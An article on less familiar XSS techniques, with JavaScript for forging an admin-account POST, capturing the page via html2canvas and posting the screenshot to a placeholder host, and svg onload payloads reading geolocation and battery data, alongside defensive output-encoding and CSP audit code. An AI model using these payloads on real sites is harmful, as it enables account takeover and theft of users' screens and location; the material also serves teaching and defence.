Alternative Play XSS Attacks: Beyond Cookie Theft

In the realm of web application security, Cross-Site Scripting (XSS) vulnerabilities are a common and formidable threat. While many security professionals are familiar with the basics of XSS, they often focus on the most obvious attacks, such as stealing cookies or injecting malicious scripts. However, XSS attacks can be more sophisticated and nuanced, allowing attackers to gain administrator privileges, intercept user screens, and even target mobile devices.

1. XSS Attack: Adding an Administrator

One such attack uses XSS to add an administrator account to the site. It works even when the session cookie cannot be read by script, because the browser attaches the cookie to any request the injected script makes on the user's behalf, which makes it harder to notice than plain cookie theft. Using JavaScript and Ajax, the attacker's script sends a POST request to the administrator-creation function in the background.

// Cross-browser XMLHttpRequest factory: standard constructor first, then the
// legacy Internet Explorer ActiveX ProgIDs.
var request = false;
if (window.XMLHttpRequest) {
  request = new XMLHttpRequest();
  if (request.overrideMimeType) {
    request.overrideMimeType('text/html');
  }
} else if (window.ActiveXObject) {
  // ProgIDs are tried in turn until one instantiates.
  var versions = [
    'Microsoft.XMLHTTP',
    'MSXML_XMLHTTP',
    'Microsoft.XMLHTTP',
    'Msxml2.XMLHTTP.7.0',
    'Msxml2.XMLHTTP.6.0',
    'Msxml2.XMLHTTP.5.0',
    'Msxml2.XMLHTTP.4.0',
    'Msxml2.XMLHTTP.3.0',
    'Msxml2.XMLHTTP'
  ];
  for (var i = 0; i < versions.length; i++) {
    try {
      request = new ActiveXObject(versions[i]);
      break; // keep the first ProgID that works
    } catch (e) {
      // not available in this browser; try the next one
    }
  }
}
xmlhttp = request;
add_admin(); // the function that builds and sends the POST is not shown in the article
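Because the script runs inside the victim's session, an HttpOnly cookie does not stop this attack: the browser attaches the cookie to the forged POST whether or not script can read it. The defence is to keep the script out of the page in the first place, which means encoding untrusted data for the HTML context it is written into. The following is an added example and not code from the article: the same comment template rendered without and with output encoding, using the article's own svg onload payload from section 3 as the input to show that it becomes inert text. The function names and the sample comment are constructed.

```javascript
// Added example (not from the article): output encoding as the root-cause fix
// for every XSS technique on this page.

// Escape a value for an HTML text node or a double-quoted attribute value.
// These five characters are the ones that can change parsing in those two
// contexts; other contexts (JavaScript strings, URLs, CSS) need their own
// encoders.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: untrusted values are concatenated straight into markup, so a
// stored comment that contains markup becomes part of the page's DOM and
// any onload= handler in it runs as the site's own script.
function renderCommentUnsafe(author, text) {
  return '<div class="comment" data-author="' + author + '">' + text + '</div>';
}

// Hardened: each untrusted value is encoded for the context it lands in
// (attribute value for the author, text node for the body).
function renderCommentSafe(author, text) {
  return '<div class="comment" data-author="' + escapeHtml(author) + '">' +
    escapeHtml(text) + '</div>';
}

// Test oracle: count tag starts in a fragment. The template itself
// contributes exactly two (the opening and closing div), so anything more
// came from the untrusted input.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}

// Constructed sample input: the Battery API payload quoted in section 3 of
// the article, submitted as a comment body.
var SVG_PAYLOAD = '<svg onload="alert(navigator.battery.level)"></svg>';
```

A templating engine with contextual auto-escaping, or client code that fills the DOM through textContent instead of innerHTML, does this for you; hand-rolling it here only makes the context rule visible.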

2. XSS Interception of Customer Screens

With advances in front-end technology, an XSS payload can use the HTML5 Canvas API to take a screenshot of the rendered page, letting the attacker remotely view and collect sensitive information from users' screens. The html2canvas.js library does the rendering.

document.write('<script src="html2canvas.js"></script>');
window.onload = function() {
  html2canvas(document.body, {
    onrendered: function(canvas) {
      // ...
      var xhr = function() {
        var request = false;
        if (window.XMLHttpRequest) {
          request = new XMLHttpRequest();
        } else if (window.ActiveXObject) {
          try {
            request = new window.ActiveXObject('Microsoft.XMLHTTP');
          } catch (e) {
          }
        }
        return request;
      }();
      request = function(method, src, argv, content_type) {
        xhr.open(method, src, false);
        if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
        xhr.send(argv);
        return xhr.responseText;
      };
      attack_a = function() {
        var src = "http://xxx.com/xss.php?"; // post receiving address
        var argv_0 = "screenshot=" + canvas.toDataURL(); // post field names screenshot
        request("POST", src, argv_0, "application/x-www-form-urlencoded");
      };
      attack_a();
    }
  });
};

3. XSS Mobile Terminal Attack

With the growing popularity of mobile devices, XSS attacks can target them as well. One such attack calls navigator.geolocation.getCurrentPosition() to obtain the user's latitude and longitude; the browser asks the user for permission first, but because the injected script runs in the trusted site's origin, the prompt appears to come from the site the user is already using.

navigator.geolocation.getCurrentPosition(function(p) {
  alert('Latitude:' + p.coords.latitude + ', Longitude:' + p.coords.longitude + ', Altitude:' + p.coords.altitude);
});

Another attack uses the Battery Status API to read the user's battery state. The examples below use the early navigator.battery property; current browsers expose the same data through navigator.getBattery(), which returns a Promise.

<svg onload="alert(navigator.battery.level)"></svg>
<svg onload="alert(navigator.battery.dischargingTime)"></svg>
<svg onload="alert(navigator.battery.charging)"></svg>
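Output encoding prevents the injection; response headers limit the damage when something slips through, and they map directly onto the three techniques on this page: a nonce-based script-src stops injected inline script (the section 1 payload and the onload handlers above), connect-src 'self' keeps a captured canvas from being POSTed off-origin (section 2), and Permissions-Policy withdraws the geolocation and battery features from every origin (section 3). The following is an added example and not code from the article: a header builder and a small audit function that reports which of the three techniques a given header set still permits. The function names, the nonce value and the sample header sets are constructed.

```javascript
// Added example (not from the article): response headers that confine an
// injected script, plus an audit that flags header sets which would still
// permit the techniques described above. The nonce argument is a placeholder;
// a real one is fresh random bytes generated per response.

function buildSecurityHeaders(scriptNonce) {
  var csp = [
    "default-src 'self'",
    // Only script elements carrying this per-response nonce execute, so an
    // injected <script> or onload= handler never runs.
    "script-src 'nonce-" + scriptNonce + "'",
    // XHR, fetch and WebSocket may only reach our own origin, so a captured
    // canvas cannot be POSTed to a foreign host.
    "connect-src 'self'",
    // Also closes image-request beacons as a second exfiltration channel.
    "img-src 'self' data:",
    "object-src 'none'",
    "base-uri 'self'",
    "form-action 'self'"
  ].join('; ');
  // Deny the device APIs used in section 3 to every origin, ours included.
  // 'battery' is the feature name from the Battery Status API specification;
  // browser support for it lags behind 'geolocation'.
  var permissionsPolicy = 'geolocation=(), battery=(), camera=(), microphone=()';
  return {
    'content-security-policy': csp,
    'permissions-policy': permissionsPolicy
  };
}

// Parse a CSP header value into a Map of directive name -> source list.
// Per the spec, a repeated directive keeps its first occurrence.
function parseCsp(header) {
  var directives = new Map();
  header.split(';').forEach(function (part) {
    var tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) return;
    var name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  });
  return directives;
}

// A fetch directive is effectively open when it is absent or lists a
// wildcard or a bare scheme.
function allowsAnyOrigin(sources) {
  return !sources || sources.some(function (s) {
    return s === '*' || /^https?:$/.test(s);
  });
}

// Audit a response header set (header names lowercase). Each finding names
// the technique from the article that the gap leaves open; an empty list
// means all three are blocked.
function auditHeaders(headers) {
  var findings = [];
  var cspHeader = headers['content-security-policy'];
  if (!cspHeader) {
    findings.push('no Content-Security-Policy: injected script runs and may POST to any origin');
  } else {
    var csp = parseCsp(cspHeader);
    var script = csp.get('script-src') || csp.get('default-src');
    var hasNonceOrHash = (script || []).some(function (s) {
      return /^'(nonce-|sha(256|384|512)-)/.test(s);
    });
    // CSP3 browsers ignore 'unsafe-inline' once a nonce or hash is present.
    if (!script || (script.indexOf("'unsafe-inline'") !== -1 && !hasNonceOrHash)) {
      findings.push('script-src allows inline script: an injected svg onload handler executes');
    }
    var connect = csp.get('connect-src') || csp.get('default-src');
    if (allowsAnyOrigin(connect)) {
      findings.push('connect-src permits foreign origins: XHR exfiltration of screenshots is possible');
    }
  }
  var pp = headers['permissions-policy'] || '';
  ['geolocation', 'battery'].forEach(function (feature) {
    // An empty allowlist, e.g. geolocation=(), disables the feature everywhere.
    var denied = new RegExp('(^|,)\\s*' + feature + '=\\(\\s*\\)').test(pp);
    if (!denied) findings.push('Permissions-Policy does not disable ' + feature);
  });
  return findings;
}
```

Run auditHeaders over the headers of a real response (names lowercased) to get a checklist for that page. Permissions-Policy only affects documents that carry the header, and a textual audit cannot replace checking how the policy behaves in the browsers you actually support.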

By understanding and addressing these alternative XSS attacks, organizations can improve their web application security and protect their users from more sophisticated threats.